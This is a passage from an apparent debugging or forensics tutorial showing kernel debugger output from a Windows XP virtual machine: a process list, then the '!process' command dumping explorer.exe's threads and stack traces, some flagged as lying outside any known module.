ParentCid: 0594<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DirBase: 08040100 ObjectTable: e1c3dfb8 HandleCount: 60.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Image: VMwareTray.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier 
New',courier,monospace; background-color: #fbfbfb">PROCESS 82452020 SessionId: 0 Cid: 06f8 Peb: 7ffd9000 ParentCid: 0594<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DirBase: 08040220 ObjectTable: e1909bb0 HandleCount: 200.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Image: VMwareUser.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">PROCESS 827f03c0 SessionId: 0 Cid: 0430 Peb: 7ffdb000 ParentCid: 02ac<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DirBase: 08040180 ObjectTable: e1c66998 HandleCount: 260.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Image: vmtoolsd.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">PROCESS 82456830 SessionId: 0 Cid: 050c Peb: 7ffdf000 ParentCid: 02ac<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DirBase: 08040280 ObjectTable: e1942f20 HandleCount: 97.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Image: VMUpgradeHelper.exe<br /></pre><pre 
style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">PROCESS 826b3da0 SessionId: 0 Cid: 00b0 Peb: 7ffdf000 ParentCid: 0448<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DirBase: 080402c0 ObjectTable: e2115538 HandleCount: 48.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Image: wscntfy.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">PROCESS 822b1b28 SessionId: 0 Cid: 0188 Peb: 7ffde000 ParentCid: 02ac<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DirBase: 080402e0 ObjectTable: e219e928 HandleCount: 105.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Image: alg.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">PROCESS 828e3460 SessionId: 0 Cid: 0160 Peb: 7ffd9000 ParentCid: 0448<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DirBase: 08040320 ObjectTable: 
e21ec500 HandleCount: 146.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Image: wuauclt.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">PROCESS 828509f8 SessionId: 0 Cid: 0174 Peb: 7ffdc000 ParentCid: 0594<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DirBase: 080402a0 ObjectTable: 00000000 HandleCount: 0.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Image: md5.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">PROCESS 82161020 SessionId: 0 Cid: 0194 Peb: 7ffdc000 ParentCid: 0594<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DirBase: 08040200 ObjectTable: e21bb870 HandleCount: 319.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Image: procexp.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">PROCESS 8217bda0 SessionId: 0 Cid: 0570 Peb: 
7ffdf000 ParentCid: 0594<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DirBase: 08040360 ObjectTable: e21a5520 HandleCount: 49.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Image: cmd.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">PROCESS 827f48b0 SessionId: 0 Cid: 07dc Peb: 7ffde000 ParentCid: 0594<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DirBase: 08040380 ObjectTable: e27dabc0 HandleCount: 72.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Image: Filemon.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">PROCESS 821ba240 SessionId: 0 Cid: 0328 Peb: 7ffdf000 ParentCid: 0594<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DirBase: 08040260 ObjectTable: e1fd9008 HandleCount: 49.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Image: cmd.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: 
#ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">PROCESS 82569668 SessionId: 0 Cid: 0400 Peb: 7ffda000 ParentCid: 01cc<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DirBase: 08040420 ObjectTable: e27ea8a8 HandleCount: 51.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Image: notepad.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">PROCESS 821e9270 SessionId: 0 Cid: 0330 Peb: 7ffde000 ParentCid: 00d0<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DirBase: 080403a0 ObjectTable: 00000000 HandleCount: 0.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Image: dikyufy.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">PROCESS 8215f4c8 SessionId: 0 Cid: 0728 Peb: 7ffde000 ParentCid: 0594<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DirBase: 080404a0 ObjectTable: e1254b88 HandleCount: 115.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier 
New',courier,monospace; background-color: #fbfbfb"> Image: vmmap.exe</pre></pre><br /><p>The entry for explorer.exe is:</p><br /><p>PROCESS 827f9020 SessionId: 0 Cid: 0594 Peb: 7ffda000 ParentCid: 056c<br /> DirBase: 080401c0 ObjectTable: e1893ed8 HandleCount: 817.<br /> Image: explorer.exe</p><p>To see the details of explorer.exe, the following command can be executed, where 827f9020 is the PROCESS address from the listing above:</p><br /><p> !process 827f9020 1f</p><pre style="border-right: #cecece 1px solid; padding-right: 5px; border-top: #cecece 1px solid; padding-left: 5px; min-height: 40px; padding-bottom: 5px; overflow: auto; border-left: #cecece 1px solid; width: 547px; padding-top: 5px; border-bottom: #cecece 1px solid; height: 237px; background-color: #fbfbfb"><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">kd> !process 827f9020 1f<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff">PROCESS 827f9020 SessionId: 0 Cid: 0594 Peb: 7ffda000 ParentCid: 056c<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> DirBase: 080401c0 ObjectTable: e1893ed8 HandleCount: 840.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 97.72%; font-family: consolas,'Courier New',courier,monospace; height: 31px; background-color: #ffffff"> Image: explorer.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> VadRoot 828c6ed0 Vads 453 Clone 0 <span style="color: #0000ff">Private</span> 4113. Modified 300223. 
Locked 0.<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DeviceMap e1cba0b0<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Token e1f32940<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> ElapsedTime 79 Days 20:15:11.781<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> UserTime 00:00:35.453<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> KernelTime 00:01:39.687<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> QuotaPoolUsage[PagedPool] 160060<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> QuotaPoolUsage[NonPagedPool] 52216<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Working <span style="color: #0000ff">Set</span> Sizes (<span style="color: #0000ff">now</span>,min,max) (3723, 50, 345) (14892KB, 200KB, 1380KB)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> PeakWorkingSetSize 11379<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> VirtualSize 96 Mb<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; 
background-color: #ffffff"> PeakVirtualSize 126 Mb
 PageFaultCount 156083
 MemoryPriority BACKGROUND
 BasePriority 8
 CommitCharge 5551

 THREAD 823e83f0 Cid 0594.0598 Teb: 7ffdf000 Win32Thread: e1d9b2d8 WAIT: (WrUserRequest) UserMode Non-Alertable
 826fee88 SynchronizationEvent
 Not impersonating
 DeviceMap e1cba0b0
 Owning Process 827f9020 Image: explorer.exe
 Attached Process N/A Image: N/A
 Wait Start TickCount 696150 Ticks: 643 (0:00:00:10.046)
 Context Switch Count 5674 LargeStack
 UserTime 00:00:00.078
 KernelTime 00:00:01.000
 Win32 Start Address Explorer!ModuleEntry (0x0101e24e)
 Start Address kernel32!BaseProcessStartThunk (0x7c810867)
 Stack Init f80d7000 Current f80d6cb0 Base f80d7000 Limit f80d1000 Call 0
 Priority 12 BasePriority 8 PriorityDecrement 2 DecrementCount 16
 ChildEBP RetAddr
 f80d6cc8 8050017a nt!KiSwapContext+0x2e (FPO: [Uses EBP] [0,0,4])
 f80d6cd4 804f99be nt!KiSwapThread+0x46 (FPO: [0,0,0])
 f80d6cfc bf802ec4 nt!KeWaitForSingleObject+0x1c2 (FPO: [Non-Fpo])
WARNING: Frame IP not in any known module. Following frames may be wrong.
 f80d6d5c 8053c808 0xbf802ec4
 f80d6d5c 0000003b nt!KiFastCallEntry+0xf8 (FPO: [0,0] TrapFrame-EDITED @ f80d6d4c)
 8053c804 0d8be58b 0x3b
 8053c808 ffdff124 0xd8be58b
 8053c80c 893c558b 0xffdff124
 8053c810 00013491 0x893c558b
 8053c814 45f7fa00 0x13491
 8053c818 02000070 0x45f7fa00
 8053c81c f6067500 0x2000070
 8053c820 74016c45 0xf6067500
 8053c824 241d8b57 0x74016c45
 8053c828 c6ffdff1 0x241d8b57
 8053c82c 80002e43 0xc6ffdff1
 8053c830 74004a7b 0x80002e43
 8053c834 89dd8b47 0x74004a7b
 8053c838 43c74443 0x89dd8b47
 8053c83c 00000000 0x43c74443

 THREAD 826fdb88 Cid 0594.05b0 Teb: 7ffdc000 Win32Thread: e195f8b8 WAIT: (WrUserRequest) UserMode Non-Alertable
 82451220 SynchronizationEvent
 Not impersonating
 DeviceMap e1cba0b0
 Owning Process 827f9020 Image: explorer.exe
 Attached Process N/A Image: N/A
 Wait Start TickCount 696780 Ticks: 13 (0:00:00:00.203)
 Context Switch Count 134374 LargeStack
 UserTime 00:00:01.359
 KernelTime 00:00:12.546
 Win32 Start Address SHLWAPI!WrapperThreadProc (0x77f7f56f)
 Start Address kernel32!BaseThreadStartThunk (0x7c810856)
 Stack Init b29a9000 Current b29a8cb0 Base b29a9000 Limit b29a3000 Call 0
 Priority 11 BasePriority 9 PriorityDecrement 0 DecrementCount 16
 ChildEBP RetAddr
 b29a8cc8 8050017a nt!KiSwapContext+0x2e (FPO: [Uses EBP] [0,0,4])
 b29a8cd4 804f99be nt!KiSwapThread+0x46 (FPO: [0,0,0])
 b29a8cfc bf802ec4 nt!KeWaitForSingleObject+0x1c2 (FPO: [Non-Fpo])
WARNING: Frame IP not in any known module. Following frames may be wrong.
 b29a8d5c 8053c808 0xbf802ec4
 b29a8d5c 0000003b nt!KiFastCallEntry+0xf8 (FPO: [0,0] TrapFrame-EDITED @ b29a8d4c)
 8053c804 0d8be58b 0x3b
 8053c808 ffdff124 0xd8be58b
 8053c80c 893c558b 0xffdff124
 8053c810 00013491 0x893c558b
 8053c814 45f7fa00 0x13491
 8053c818 02000070 0x45f7fa00
 8053c81c f6067500 0x2000070
 8053c820 74016c45 0xf6067500
 8053c824 241d8b57 0x74016c45
 8053c828 c6ffdff1 0x241d8b57
 8053c82c 80002e43 0xc6ffdff1
 8053c830 74004a7b 0x80002e43
 8053c834 89dd8b47 0x74004a7b
 8053c838 43c74443 0x89dd8b47
 8053c83c 00000000 0x43c74443

 THREAD 82453680 Cid 0594.05b8 Teb: 7ffdb000 Win32Thread: 00000000 WAIT: (DelayExecution) UserMode Alertable
 82453770 NotificationTimer
 Not impersonating
 DeviceMap e1cba0b0
 Owning Process 827f9020 Image: explorer.exe
 Attached Process N/A Image: N/A
 Wait Start TickCount 696150 Ticks: 643 (0:00:00:10.046)
 Context Switch Count 193
 UserTime 00:00:00.000
 KernelTime 00:00:00.015
 Win32 Start Address ntdll!RtlpTimerThread (0x7c92798d)
 Start Address kernel32!BaseThreadStartThunk (0x7c810856)
 Stack Init b29ed000 Current b29eccbc Base b29ed000 Limit b29ea000 Call 0
 Priority 10 BasePriority 8 PriorityDecrement 0 DecrementCount 16
 ChildEBP RetAddr
 b29eccd4 8050017a nt!KiSwapContext+0x2e (FPO: [Uses EBP] [0,0,4])
 b29ecce0 804f93fb nt!KiSwapThread+0x46 (FPO: [0,0,0])
 b29ecd0c 8060b2f5 nt!KeDelayExecutionThread+0x1c9 (FPO: [Non-Fpo])
 b29ecd54 8053c808 nt!NtDelayExecution+0x87 (FPO: [Non-Fpo])
 b29ecd54 7c90eb94 nt!KiFastCallEntry+0xf8 (FPO: [0,0] TrapFrame @ b29ecd64)
 00fbff98 7c90d85c ntdll!KiFastSystemCallRet (FPO: [0,0,0])
 00fbff9c 7c9279d4 ntdll!NtDelayExecution+0xc (FPO: [2,0,0])
 00fbffb4 7c80b50b ntdll!RtlpTimerThread+0x47 (FPO: [Non-Fpo])
 00fbffec 00000000 kernel32!BaseThreadStart+0x37 (FPO: [Non-Fpo])

 THREAD 826f6670 Cid 0594.05c0 Teb: 7ffd8000 Win32Thread: 00000000 WAIT: (UserRequest) UserMode Alertable
 822dd9e0 NotificationTimer
 82453a18 SynchronizationEvent
 826f0708 NotificationEvent
 82498508 NotificationEvent
 82810860 SynchronizationEvent
 828ba380 SynchronizationEvent
 821b12c8 SynchronizationEvent
 8227a608 SynchronizationEvent
 820e2608 SynchronizationEvent
 821ec1b0 SynchronizationEvent
 821ed7c0 SynchronizationEvent
 82164698 SynchronizationEvent
 82481708 SynchronizationEvent
 825d2c40 SynchronizationEvent
 8278cfc8 SynchronizationEvent
 828a7638 SynchronizationEvent
 821583c8 SynchronizationEvent
 822ea740 SynchronizationEvent
 823bac58 SynchronizationEvent
 8265fe30 SynchronizationEvent
 829e1514 NotificationEvent
 82518fc0 SynchronizationEvent
 Not impersonating
 DeviceMap e1cba0b0
 Owning Process 827f9020 Image: explorer.exe
 Attached Process N/A Image: N/A
 Wait Start TickCount 696150 Ticks: 643 (0:00:00:10.046)
 Context Switch Count 18
 UserTime 00:00:00.000
 KernelTime 00:00:00.000
 Win32 Start Address ntdll!RtlpWaitThread (0x7c929fae)
 Start Address kernel32!BaseThreadStartThunk (0x7c810856)
 Stack Init b29e1000 Current b29e095c Base b29e1000 Limit b29de000 Call 0
 Priority 10 BasePriority 8 PriorityDecrement 2 DecrementCount 16
 ChildEBP RetAddr
 b29e0974 8050017a nt!KiSwapContext+0x2e (FPO: [Uses EBP] [0,0,4])
 b29e0980 804f973e nt!KiSwapThread+0x46 (FPO: [0,0,0])
 b29e09b8 805b4d6a nt!KeWaitForMultipleObjects+0x284 (FPO: [Non-Fpo])
 b29e0d48 8053c808 nt!NtWaitForMultipleObjects+0x2a2 (FPO: [Non-Fpo])
 b29e0d48 7c90eb94 nt!KiFastCallEntry+0xf8 (FPO: [0,0] TrapFrame @ b29e0d64)
 0113fce8 7c90e9ab ntdll!KiFastSystemCallRet (FPO: [0,0,0])
 0113fcec 7c92a0d5 ntdll!ZwWaitForMultipleObjects+0xc (FPO: [5,0,0])
 0113ffb4 7c80b50b ntdll!RtlpWaitThread+0x13d (FPO: [Non-Fpo])
 0113ffec 00000000 kernel32!BaseThreadStart+0x37 (FPO: [Non-Fpo])

 THREAD 827456b8 Cid 0594.0614 Teb: 7ffd7000 Win32Thread: e1fa7eb0 WAIT: (UserRequest) UserMode Alertable
 8218a7cc NotificationEvent
 821abb74 NotificationEvent
 825d8084 NotificationEvent
 825cf5a4 NotificationEvent
 82741f7c NotificationEvent
 8263025c NotificationEvent
 824a8b54 NotificationEvent
 8266ae0c NotificationEvent
 8268d7c4 NotificationEvent
 822ae084 NotificationEvent
 823ae25c NotificationEvent
 8282497c NotificationEvent
 82450084 NotificationEvent
 828aa3e4 NotificationEvent
 82456ef0 SynchronizationEvent
 IRP List:
 82205190: (0006,01b4) Flags: 00000000 Mdl: 00000000
 821d73d0: (0006,01b4) Flags: 00000000 Mdl: 00000000
 8250b008: (0006,01b4) Flags: 00000000 Mdl: 00000000
 823a8e48: (0006,01b4) Flags: 00000000 Mdl: 00000000
 823b4860: (0006,01b4) Flags: 00000000 Mdl: 00000000
 822ad400: (0006,01b4) Flags: 00000000 Mdl: 00000000
 823d6368: (0006,01b4) Flags: 00000000 Mdl: 00000000
 8284c3a0: (0006,01b4) Flags: 00000000 Mdl: 00000000
 821ee450: (0006,01b4) Flags: 00000000 Mdl: 00000000
 82209910: (0006,0190) Flags: 00000000 Mdl: 00000000
 824b3008: (0006,0190) Flags: 00000000 Mdl: 00000000
 823e0008: (0006,0190) Flags: 00000000 Mdl: 00000000
 8291c6c8: (0006,0190) Flags: 00000000 Mdl: 00000000
 827ef008: (0006,0190) Flags: 00000000 Mdl: 00000000
 Not impersonating
 DeviceMap e1cba0b0
 Owning Process 827f9020 Image: explorer.exe
 Attached Process N/A Image: N/A
 Wait Start TickCount 696150 Ticks: 643 (0:00:00:10.046)
 Context Switch Count 20457 LargeStack
 UserTime 00:00:00.078
 KernelTime 00:00:00.718
 Win32 Start Address SHLWAPI!WrapperThreadProc (0x77f7f56f)
 Start Address kernel32!BaseThreadStartThunk (0x7c810856)
 Stack Init b2989000 Current b298895c Base b2989000 Limit b2985000 Call 0
 Priority 10 BasePriority 8 PriorityDecrement 0 DecrementCount 16
 ChildEBP RetAddr
 b2988974 8050017a nt!KiSwapContext+0x2e (FPO: [Uses EBP] [0,0,4])
 b2988980 804f973e nt!KiSwapThread+0x46 (FPO: [0,0,0])
 b29889b8 805b4d6a nt!KeWaitForMultipleObjects+0x284 (FPO: [Non-Fpo])
 b2988d48 8053c808 nt!NtWaitForMultipleObjects+0x2a2 (FPO: [Non-Fpo])
 b2988d48 7c90eb94 nt!KiFastCallEntry+0xf8 (FPO: [0,0] TrapFrame @ b2988d64)
 011bfd2c 7c90e9ab ntdll!KiFastSystemCallRet (FPO: [0,0,0])
 011bfd30 7c8094f2 ntdll!ZwWaitForMultipleObjects+0xc (FPO: [5,0,0])
 011bfdcc 77d4bbfe kernel32!WaitForMultipleObjectsEx+0x12c (FPO: [Non-Fpo])
</pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; 
background-color: #ffffff"> 011bfe28 7c9f43d9 USER32!RealMsgWaitForMultipleObjectsEx+0x13e (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 011bff4c 7ca3114e SHELL32!CChangeNotify::_MessagePump+0x3b (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 011bff50 77f7f5de SHELL32!CChangeNotify::ThreadProc+0x1e (FPO: [1,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> 011bffb4 7c80b50b SHLWAPI!WrapperThreadProc+0x94 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 011bffec 00000000 kernel32!BaseThreadStart+0x37 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> THREAD 827eada8 Cid 0594.06f4 Teb: 7ffac000 Win32Thread: e1c436a8 WAIT: (WrUserRequest) UserMode <br /><br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">Non-Alertable<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> 82491ff0 SynchronizationEvent<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> <span style="color: #0000ff">Not</span> impersonating<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; 
font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> DeviceMap e1cba0b0<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Owning Process 827f9020 Image: explorer.exe<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Attached Process N/A Image: N/A<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Wait Start TickCount 696150 Ticks: 643 (0:00:00:10.046)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Context Switch Count 105062 LargeStack<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> UserTime 00:00:00.234<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> KernelTime 00:00:04.703<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Win32 Start Address stobject!CSysTray::SysTrayThreadProc (0x762836f7)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> Start Address kernel32!BaseThreadStartThunk (0x7c810856)<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> Stack Init b286e000 Current b286dc20 Base b286e000 Limit b286a000 <span style="color: #0000ff">Call</span> 0<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier 
New',courier,monospace; background-color: #ffffff"> Priority 12 BasePriority 8 PriorityDecrement 2 DecrementCount 16<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> ChildEBP RetAddr <br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b286dc38 8050017a nt!KiSwapContext+0x2e (FPO: [Uses EBP] [0,0,4])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb"> b286dc44 804f99be nt!KiSwapThread+0x46 (FPO: [0,0,0])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #ffffff"> b286dc6c bf802ec4 nt!KeWaitForSingleObject+0x1c2 (FPO: [Non-Fpo])<br /></pre><pre style="font-size: 12px; margin: 0em; width: 100%; font-family: consolas,'Courier New',courier,monospace; background-color: #fbfbfb">WARNING: Frame IP <span style="color: #0000ff">not</span> <span style="color: #0000ff">in</span> any known module. 
